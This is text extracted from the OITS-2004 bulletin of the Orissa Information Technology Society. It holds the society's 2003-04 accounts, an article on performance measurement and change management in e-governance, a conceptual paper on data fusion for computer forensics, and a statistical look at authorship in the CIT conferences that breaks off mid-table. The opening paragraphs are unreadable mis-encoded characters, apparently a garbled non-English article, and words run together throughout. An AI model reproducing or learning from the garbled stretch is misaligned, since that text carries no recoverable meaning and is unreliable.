bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 12: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

